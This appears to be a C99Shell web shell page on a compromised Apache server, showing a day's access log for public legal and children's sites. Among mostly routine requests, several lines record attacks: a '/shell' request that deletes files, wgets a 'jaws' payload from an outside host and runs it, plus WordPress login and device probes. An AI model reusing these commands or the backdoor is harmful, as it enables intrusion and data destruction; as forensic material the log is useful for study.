!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.09.22.log (3.96 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [22/Sep/2022:00:00:15 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Sep/2022:00:03:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [22/Sep/2022:00:02:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.102.26.207 - - [22/Sep/2022:00:03:51 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX18Zi181raapcqdOAjYWU7IB7mbCKTNNsoLRdaI2n87ZM44xjf0Xkd7bAfUnCcirgAUOC8muVdJ9abQmAwe3EPC6IXRgG6+PmYiUoW4zAq4D1f1UU5v2O3ziqYmOEjduyHtsrLxNwrnj3Q==&u=U2FsdGVkX18/PLXxiRftP9IJUv5j6Xhm9584umg+VJZc0vQlCDiugpjZeYqbvWP3&y=U2FsdGVkX1/d/uf0au3irvGPX60zlMVIwV0koMEzpmKJCgCPvwov1C9iWk+W5d8Z HTTP/1.1" 200 60
172.22.2.4 - - [22/Sep/2022:00:02:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
216.245.221.92 - - [22/Sep/2022:00:05:15 -0500] "HEAD / HTTP/1.1" 200 -
35.204.25.211 - - [22/Sep/2022:00:07:00 -0500] "GET / HTTP/1.1" 200 319
35.204.25.211 - - [22/Sep/2022:00:07:00 -0500] "GET / HTTP/1.1" 200 4720
207.46.13.181 - - [22/Sep/2022:00:07:32 -0500] "GET /portaldeninos/relatos-urbanos-de-los-ecosistemas-bogotanos-2/ HTTP/1.1" 200 88374
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/arr_l.jpg HTTP/1.1" 200 1979
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [22/Sep/2022:00:08:42 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
201.245.192.253 - - [22/Sep/2022:00:08:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [22/Sep/2022:00:08:44 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [22/Sep/2022:00:08:44 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [22/Sep/2022:00:08:44 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [22/Sep/2022:00:08:44 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [22/Sep/2022:00:08:44 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [22/Sep/2022:00:08:45 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [22/Sep/2022:00:08:52 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [22/Sep/2022:00:09:04 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4383&usuario=&sector=&fecha=2008&resuelve= HTTP/1.1" 200 1079
190.24.103.254 - - [22/Sep/2022:00:09:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4383.pdf HTTP/1.1" 200 897393
190.24.103.254 - - [22/Sep/2022:00:09:09 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [22/Sep/2022:00:07:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.86 - - [22/Sep/2022:00:09:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202005/00001081.tif HTTP/1.1" 200 148524
172.22.2.4 - - [22/Sep/2022:00:08:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44471
216.245.221.92 - - [22/Sep/2022:00:10:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [22/Sep/2022:00:08:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46329
157.55.39.202 - - [22/Sep/2022:00:11:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1865.pdf HTTP/1.1" 200 466582
152.61.192.232 - - [22/Sep/2022:00:13:41 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [22/Sep/2022:00:13:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.100 - - [22/Sep/2022:00:13:54 -0500] "-" 408 -
216.245.221.92 - - [22/Sep/2022:00:15:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [22/Sep/2022:00:13:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.84.116.2 - - [22/Sep/2022:00:15:36 -0500] "GET /StormSDA/storm/StormUser.jar HTTP/1.1" 200 306268
64.62.197.138 - - [22/Sep/2022:00:15:48 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [22/Sep/2022:00:14:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
201.245.192.253 - - [22/Sep/2022:00:18:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [22/Sep/2022:00:19:12 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=2771&usuario=&sector=&fecha=2010&resuelve= HTTP/1.1" 200 1167
152.61.128.50 - - [22/Sep/2022:00:19:21 -0500] "GET / HTTP/1.1" 200 319
190.24.103.254 - - [22/Sep/2022:00:19:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2771.pdf HTTP/1.1" 200 725919
201.245.192.253 - - [22/Sep/2022:00:19:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41973
201.245.192.253 - - [22/Sep/2022:00:19:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43240
216.245.221.92 - - [22/Sep/2022:00:20:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [22/Sep/2022:00:19:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.84.116.2 - - [22/Sep/2022:00:21:42 -0500] "GET /StormSDA/userFiles/user_files.jnlp HTTP/1.1" 200 1353
172.22.2.4 - - [22/Sep/2022:00:20:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
190.84.116.2 - - [22/Sep/2022:00:22:13 -0500] "GET /StormSDA/userFiles/basicos.jar HTTP/1.1" 200 671328
201.245.192.253 - - [22/Sep/2022:00:23:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [22/Sep/2022:00:24:01 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
216.245.221.92 - - [22/Sep/2022:00:25:14 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.102 - - [22/Sep/2022:00:25:58 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [22/Sep/2022:00:25:59 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [22/Sep/2022:00:25:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [22/Sep/2022:00:26:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [22/Sep/2022:00:28:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
201.245.192.253 - - [22/Sep/2022:00:29:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41973
201.245.192.253 - - [22/Sep/2022:00:29:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43240
157.55.39.200 - - [22/Sep/2022:00:29:58 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [22/Sep/2022:00:30:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [22/Sep/2022:00:31:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Sep/2022:00:33:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [22/Sep/2022:00:32:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
216.245.221.92 - - [22/Sep/2022:00:35:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Sep/2022:00:38:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [22/Sep/2022:00:37:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Sep/2022:00:39:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41973
201.245.192.253 - - [22/Sep/2022:00:39:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43240
172.22.2.4 - - [22/Sep/2022:00:37:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
216.245.221.92 - - [22/Sep/2022:00:40:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Sep/2022:00:43:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
207.46.13.86 - - [22/Sep/2022:00:44:36 -0500] "GET /bla/resoluciones/autos%202021/5773.pdf HTTP/1.1" 200 360141
172.22.2.4 - - [22/Sep/2022:00:42:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.200 - - [22/Sep/2022:00:44:41 -0500] "GET /BLA/resoluciones/0002.tif HTTP/1.1" 404 1018
216.245.221.92 - - [22/Sep/2022:00:45:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [22/Sep/2022:00:43:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
109.74.204.123 - - [22/Sep/2022:00:47:21 -0500] "GET / HTTP/1.0" 200 319
207.46.13.86 - - [22/Sep/2022:00:47:36 -0500] "GET /bla/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [22/Sep/2022:00:47:42 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
66.249.73.100 - - [22/Sep/2022:00:47:51 -0500] "-" 408 -
109.74.204.123 - - [22/Sep/2022:00:48:13 -0500] "\x16\x03\x01\x02" 400 226
109.74.204.123 - - [22/Sep/2022:00:48:13 -0500] "\x16\x03\x01\x02" 400 226
109.74.204.123 - - [22/Sep/2022:00:48:13 -0500] "GET /HNAP1 HTTP/1.1" 404 1043
109.74.204.123 - - [22/Sep/2022:00:48:15 -0500] "\x16\x03\x01\x02" 400 226
109.74.204.123 - - [22/Sep/2022:00:48:15 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
109.74.204.123 - - [22/Sep/2022:00:48:16 -0500] "GET /CSS/Miniweb.css HTTP/1.1" 404 1043
109.74.204.123 - - [22/Sep/2022:00:48:16 -0500] "\x16\x03\x01\x02" 400 226
109.74.204.123 - - [22/Sep/2022:00:48:17 -0500] "GET / HTTP/1.0" 200 319
109.74.204.123 - - [22/Sep/2022:00:48:17 -0500] "GET / HTTP/1.1" 200 319
109.74.204.123 - - [22/Sep/2022:00:48:17 -0500] "HEAD / HTTP/1.1" 200 -
109.74.204.123 - - [22/Sep/2022:00:48:19 -0500] "\x16\x03\x01\x02" 400 226
109.74.204.123 - - [22/Sep/2022:00:48:19 -0500] "GET / HTTP/1.1" 200 319
109.74.204.123 - - [22/Sep/2022:00:48:19 -0500] "POST /sdk HTTP/1.1" 404 1043
109.74.204.123 - - [22/Sep/2022:00:48:20 -0500] "\x16\x03\x01\x02" 400 226
109.74.204.123 - - [22/Sep/2022:00:48:21 -0500] "GET /gPCb HTTP/1.1" 404 1043
109.74.204.123 - - [22/Sep/2022:00:48:21 -0500] "\x16\x03\x01\x02" 400 226
109.74.204.123 - - [22/Sep/2022:00:48:21 -0500] "GET /readme.txt HTTP/1.1" 404 1043
109.74.204.123 - - [22/Sep/2022:00:48:21 -0500] "GET /pools/default/buckets HTTP/1.1" 404 1043
109.74.204.123 - - [22/Sep/2022:00:48:22 -0500] "GET /Portal/Portal.mwsl HTTP/1.1" 404 1043
201.245.192.253 - - [22/Sep/2022:00:48:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
216.245.221.92 - - [22/Sep/2022:00:50:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [22/Sep/2022:00:48:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [22/Sep/2022:00:49:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55630
207.46.13.131 - - [22/Sep/2022:00:52:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20301-350/00000329.tif HTTP/1.1" 200 53848
201.245.192.253 - - [22/Sep/2022:00:53:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
157.55.39.200 - - [22/Sep/2022:00:55:09 -0500] "GET /galeria/galeria/fotos/Entrenube3G.jpg HTTP/1.1" 200 138221
216.245.221.92 - - [22/Sep/2022:00:55:14 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [22/Sep/2022:00:56:04 -0500] "-" 408 -
172.22.2.4 - - [22/Sep/2022:00:54:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.156.185.197 - - [22/Sep/2022:00:56:41 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 394468
190.156.185.197 - - [22/Sep/2022:00:57:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/5856.pdf HTTP/1.1" 200 336032
172.22.2.4 - - [22/Sep/2022:00:55:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58955
186.84.21.184 - - [22/Sep/2022:00:57:46 -0500] "-" 408 -
201.245.192.253 - - [22/Sep/2022:00:58:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
152.61.192.232 - - [22/Sep/2022:00:58:49 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [22/Sep/2022:00:58:50 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [22/Sep/2022:00:58:50 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
216.245.221.92 - - [22/Sep/2022:01:00:15 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [22/Sep/2022:01:02:05 -0500] "-" 408 -
172.22.2.4 - - [22/Sep/2022:01:00:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
199.16.157.182 - - [22/Sep/2022:01:02:26 -0500] "GET /porque-tu-vida-vale-haz-parte-del-simulacro-distrital-de-evacuacion-este-4-de-octubre.html HTTP/1.1" 200 810
199.16.157.181 - - [22/Sep/2022:01:02:27 -0500] "GET /images/Simulacro%2001%20SDA.jpeg HTTP/1.1" 200 60190
199.16.157.182 - - [22/Sep/2022:01:02:27 -0500] "GET /images/Simulacro%2001%20SDA.jpeg HTTP/1.1" 200 60190
172.22.2.4 - - [22/Sep/2022:01:01:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
157.55.39.200 - - [22/Sep/2022:01:03:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/5856.pdf HTTP/1.1" 200 336032
201.245.192.253 - - [22/Sep/2022:01:03:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
152.61.128.50 - - [22/Sep/2022:01:04:27 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [22/Sep/2022:01:04:28 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [22/Sep/2022:01:04:28 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
74.71.152.145 - - [22/Sep/2022:01:05:09 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
216.245.221.92 - - [22/Sep/2022:01:05:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [22/Sep/2022:01:06:15 -0500] "GET /BLA/boletinlegal/actos.php/js/lib.js HTTP/1.1" 200 9559
172.22.2.4 - - [22/Sep/2022:01:06:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
62.231.95.189 - - [22/Sep/2022:01:08:23 -0500] "-" 408 -
201.245.192.253 - - [22/Sep/2022:01:08:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [22/Sep/2022:01:07:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
52.139.192.194 - - [22/Sep/2022:01:09:55 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+158.69.162.106/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
20.211.166.252 - - [22/Sep/2022:01:09:56 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+158.69.162.106/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
65.154.226.167 - - [22/Sep/2022:01:10:07 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
65.154.226.167 - - [22/Sep/2022:01:10:07 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
65.154.226.167 - - [22/Sep/2022:01:10:07 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
65.154.226.167 - - [22/Sep/2022:01:10:07 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
65.154.226.167 - - [22/Sep/2022:01:10:07 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
65.154.226.167 - - [22/Sep/2022:01:10:08 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
65.154.226.167 - - [22/Sep/2022:01:10:09 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
65.154.226.167 - - [22/Sep/2022:01:10:09 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
65.154.226.167 - - [22/Sep/2022:01:10:09 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
65.154.226.167 - - [22/Sep/2022:01:10:09 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
65.154.226.167 - - [22/Sep/2022:01:10:09 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
65.154.226.167 - - [22/Sep/2022:01:10:09 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
65.154.226.167 - - [22/Sep/2022:01:10:09 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
65.154.226.167 - - [22/Sep/2022:01:10:07 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
65.154.226.167 - - [22/Sep/2022:01:10:08 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
65.154.226.167 - - [22/Sep/2022:01:10:09 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
65.154.226.167 - - [22/Sep/2022:01:10:10 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
65.154.226.167 - - [22/Sep/2022:01:10:11 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.ttf?93978679 HTTP/1.1" 200 88353
216.245.221.92 - - [22/Sep/2022:01:10:14 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [22/Sep/2022:01:10:54 -0500] "-" 408 -
157.55.39.200 - - [22/Sep/2022:01:11:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20301-350/00000341.tif HTTP/1.1" 200 234116
207.46.13.131 - - [22/Sep/2022:01:11:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=v0ptrgtbdymqc7zfiurft2xh.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
201.245.192.253 - - [22/Sep/2022:01:13:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [22/Sep/2022:01:12:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
